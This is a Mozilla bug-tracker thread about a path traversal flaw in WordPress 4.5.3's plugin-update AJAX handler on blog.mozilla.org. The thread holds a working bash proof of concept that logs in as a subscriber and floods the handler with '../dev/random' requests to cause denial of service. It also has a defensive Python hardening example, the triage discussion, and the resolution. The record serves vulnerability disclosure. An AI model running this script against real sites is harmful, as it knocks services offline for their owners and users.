Bug 1301309 - Path Traversal Vulnerability in Mozilla WP-Engine Wordpress 4.5.3
Status: Closed (RESOLVED FIXED) - Opened 9 years ago, Closed 9 years ago
Categories: Websites Graveyard :: blog.mozilla.org, defect
Tracking: Not tracked
People: Reporter: minhalmehdi2000, Unassigned
Keywords: reporter-external, sec-low, wsec-traversal
Whiteboard: [kanban:https://webops.kanbanize.com/ctrl_board/2/3398] [reporter-external] [web-bounty-form] [verif?]
Attachments: 3 files
Path Traversal Vulnerability in Mozilla blog
Affected URL: https://blog.mozilla.org
CMS: WordPress
Version: 4.5.3
A path traversal vulnerability was found in the Core Ajax handlers of the WordPress 4.5.3 Admin API, and https://blog.mozilla.org is using the same version, so it is affected by the vulnerability. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition on an affected website.
The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin().
As can be seen in the attached screenshot, the function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers.
Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important is that it also allows for a denial of service condition, as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block, blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a website. It is also possible to trigger this issue via Cross-Site Request Forgery, as the nonce check is done too late in this case.
------------------------------------------------------------------------
Proof of concept
The following Bash script can be used to trigger the denial of service condition.
#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)

# login
curl --cookie-jar "$cookiejar" \
    --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
    "$target/wp-login.php" \
    >/dev/null 2>&1

# exhaust apache
for i in `seq 1 1000`
do
    curl --cookie "$cookiejar" \
        --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
        "$target/wp-admin/admin-ajax.php" \
        >/dev/null 2>&1 &
done

rm "$cookiejar"
------------------------------------------------------------------------
Fix
WordPress version 4.6 mitigates this vulnerability by moving the CSRF
Flags: sec-bounty?
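Added example, not WordPress code and not part of the report: a Python model of a hardened update-plugin handler showing the two defensive points the report turns on, namely running the nonce and capability checks before any file access, and refusing a plugin value that resolves outside the plugins directory. The 8 KB header read of get_plugin_data() is imitated; the user dict, the _ajax_nonce field and the plugin directory layout are assumptions.

```python
import os
import re
import tempfile

def read_plugin_version(path):
    # Stand-in for get_plugin_data(): scan the first 8 KB (the read the report abuses) for "Version:".
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        match = re.search(r"^\s*\*?\s*Version:\s*(.+)$", fh.read(8192), re.M)
    return match.group(1).strip() if match else ""

def resolve_plugin_path(plugin_dir, plugin):
    # Map the user-supplied 'plugin' value to a file inside plugin_dir, or refuse.
    root = os.path.realpath(plugin_dir)
    candidate = os.path.realpath(os.path.join(root, plugin))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise ValueError("plugin path escapes plugin directory")
    return candidate

def update_plugin_hardened(post, user, plugin_dir):
    # Order matters: nonce and capability checks run before anything derived from
    # the request touches the file system (the 4.5.3 handler did the reverse).
    if post.get("_ajax_nonce") != user["nonce"]:
        raise PermissionError("bad nonce")
    if "update_plugins" not in user["caps"]:
        raise PermissionError("insufficient capability")
    path = resolve_plugin_path(plugin_dir, post["plugin"])
    return {"plugin": post["plugin"], "oldVersion": read_plugin_version(path)}

def demo():
    # Exercise the handler against a constructed plugin directory (sample data).
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "hello"))
        with open(os.path.join(tmp, "hello", "hello.php"), "w") as fh:
            fh.write("<?php\n/*\nPlugin Name: Hello\nVersion: 1.2.3\n*/\n")
        subscriber = {"caps": {"read"}, "nonce": "n1"}
        admin = {"caps": {"read", "update_plugins"}, "nonce": "n2"}
        traversal = "../" * 10 + "dev/random"  # the value from the report's PoC
        try:  # a Subscriber with a valid nonce is stopped before any file access
            update_plugin_hardened({"plugin": traversal, "_ajax_nonce": "n1"}, subscriber, tmp)
        except PermissionError as exc:
            results["subscriber"] = str(exc)
        try:  # an authorised user still cannot point the read outside the directory
            update_plugin_hardened({"plugin": traversal, "_ajax_nonce": "n2"}, admin, tmp)
        except ValueError as exc:
            results["traversal"] = str(exc)
        results["admin"] = update_plugin_hardened(
            {"plugin": "hello/hello.php", "_ajax_nonce": "n2"}, admin, tmp)
    return results
```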
Comment 1 (Reporter) • 9 years ago
Comment 2 (Reporter) • 9 years ago
Comment 3 • 9 years ago
minhal - This site is hosted via WPEngine and I do see references to 4.5.3, but it's a little surprising because I believe they upgrade these on a regular interval.
fox2mike - Can you please poke WpEngine to verify the version on this site? It seems like it might not be getting upgrades or it's got some older version reference on the site.
Flags: needinfo?(smani)
Updated • 9 years ago
Keywords: sec-low, wsec-traversal
Comment 4 (Reporter) • 9 years ago
Hello, I checked the version.
The blog is still running on WordPress 4.5.3, so the vulnerability exists in the Mozilla official blog.
To check the version there are several methods, such as reading readme.html (which is deleted on your blog).
Another way is to check the source code, which may disclose the WordPress version if you don't hide it.
Steps: open https://blog.mozilla.org/
press Ctrl+U (view source)
find wp-emoji-release.min.js?ver="
in the ver= there will be the version of WordPress. You can check it on other blogs too.
So the script on the Mozilla blog is
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"https:\/\/blog.mozilla.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.3"}};
which is showing that your WordPress version is 4.5.3,
so the vulnerability exists in the,
so I'm eligible for acknowledgement?
I'm also attaching a screenshot for clarification.
Comment 5 (Reporter) • 9 years ago
Comment 6 • 9 years ago
Minhal: I saw the same thing in the blog source, we're waiting for feedback from the service owner to contact the vendor.
Summary: Path Traversal Vulnerability in Mozilla → Path Traversal Vulnerability in Mozilla WP-Engine Wordpress 4.5.3
Whiteboard: [reporter-external] [web-bounty-form] [verif?] → [kanban:https://webops.kanbanize.com/ctrl_board/2/3398] [reporter-external] [web-bounty-form] [verif?]
Minhal, which WordPress security advisory are you referencing for this specific issue? Our Wordpress instance is not necessarily stock WordPress 4.5.3 and we need to know specifically which WP vuln announcement you're referencing so we can check our mitigations.
Flags: needinfo?(minhalmehdi2000)
Comment 8 (Reporter) • 9 years ago
Hello,
it's the security advisory reference:
https://security-tracker.debian.org/tracker/CVE-2016-6896
Comment 9 • 9 years ago
Jonathan - We're on 4.6.1 now, can you confirm this is patched?
Thanks!
Flags: needinfo?(smani)
Comment 10 • 9 years ago
Confirmed!
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Comment 11 • 9 years ago
sec-bounty-'d (sec-low in a non-eligible site)
Also, lifted security flag, bug is public now.
Group: websites-security
Flags: sec-bounty? → sec-bounty-
Comment 12 (Reporter) • 9 years ago
Any acknowledgement for the report? When I reported the issue the site was on 4.5.3; you guys recently updated it.
I also attached a screenshot of version 4.5.3.
Updated • 9 years ago
Component: Other → blog.mozilla.org
Comment 13 • 9 years ago
We appreciate you reporting this to us. The Wordpress provider we use for this site was already in the process of updating Wordpress when we received your report and contacted them for a status update. Their update was performed without our direct involvement in an acceptably prompt fashion.
In general, please take care when filing newly-released software updates as security issues. If your report is derived entirely from comparing two version numbers and looking for security vulnerabilities fixed in the newer version, it is essential that it include a link to an offsite description of the issue(s) in question. Our response to you was delayed significantly due to the absence of the link you copied comment 0 from; for posterity, it appears to have been copied in part (without attribution) from:
https://sumofpwn.nl/advisory/2016/path_traversal_vulnerability_in_wordpress_core_ajax_handlers.html
Alternately, the inclusion of any publicly-assigned vulnerability tag (OVE-20160712-0036, Wordpress Trac #37490, CVE-2016-6896 or CVE-2016-6897) would have been immensely valuable. The OVE tag was present in the original source material for this report, and its removal hindered our work rather than helping it.
Clearing needinfo? as the requested information was not available upon request, and since we're already upgraded in production. Please do let us know if you find any WP instances running code older than 1-2 weeks, though - not all of our instances are managed by this provider, and if they are not updated to either 4.6.0 or 4.6.1 after a couple weeks from today, that *is* important to us and we would of course appreciate your bugs for those sites.
Flags: needinfo?(minhalmehdi2000)
Comment 14 • 9 years ago
(Some light investigation reveals that WordPress 4.6.0 contained an unannounced fix for the above-referenced CVEs, and that the referenced CVEs are still marked as 'reserved' by - presumably - Automattic themselves. I assume their ongoing embargo of the CVEs is why we were on 4.5.3 when the vulnerability and its exploit code were announced immediately prior to this bug being filed.)
Updated • 7 years ago
Product: Websites → Websites Graveyard
Updated • 7 years ago
Product: Websites Graveyard → Websites
Updated • 7 years ago
Product: Websites → Websites Graveyard
Updated • 2 years ago
Keywords: reporter-external